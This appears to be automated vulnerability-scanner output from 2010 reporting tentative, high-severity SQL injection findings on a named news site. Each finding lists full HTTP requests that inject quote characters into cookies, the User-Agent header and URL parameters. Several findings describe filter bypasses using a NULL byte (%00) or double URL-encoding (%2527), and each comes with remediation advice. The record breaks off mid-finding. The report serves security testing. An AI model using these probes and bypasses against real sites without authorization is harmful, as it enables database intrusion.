The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /giants/ci_16755841 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16755841 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/giants/ci_16755841?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:22:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:22:27 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 441
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The fcspersistslider1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fcspersistslider1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the fcspersistslider1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /giants/ci_16755841?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1%2527; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16755841?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1%2527%2527; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]...
1.225. http://www.mercurynews.com/giants/ci_16755841 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mercurynews.com
Path:
/giants/ci_16755841
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /giants/ci_16755841?source=rss&1'=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16755841?source=rss&1''=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /giants/ci_16755841?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16755841?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /giants/ci_16765848?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true'; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Veteran shortstop is excited about chance to win ring'><meta name="keywords" content="san f ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16765848?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true''; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/giants/ci_16765848?s ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /giants/ci_16785859?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='GM will look around at meetings to see if he can tweak his bench'><meta name="keywords" con ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16785859?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='GM will look around at meetings to see if he can tweak his bench'><meta name="keywords" con ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /giants/ci_16793528 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Giants payroll likely to reach $120 million for the 2010 season'><meta name="keywords" ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16793528 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/giants/ci_16793528?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:22:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:22:14 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 441
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /giants/ci_16793528 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310'; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Giants payroll likely to reach $120 million for the 2010 season'><meta name="keywords" ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16793528 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310''; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/giants/ci_16793528?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:22:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:22:06 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 441
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the source request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /giants/ci_16793528?source=rss%2527 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Giants payroll likely to reach $120 million for the 2010 season'><meta name="keywords" ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
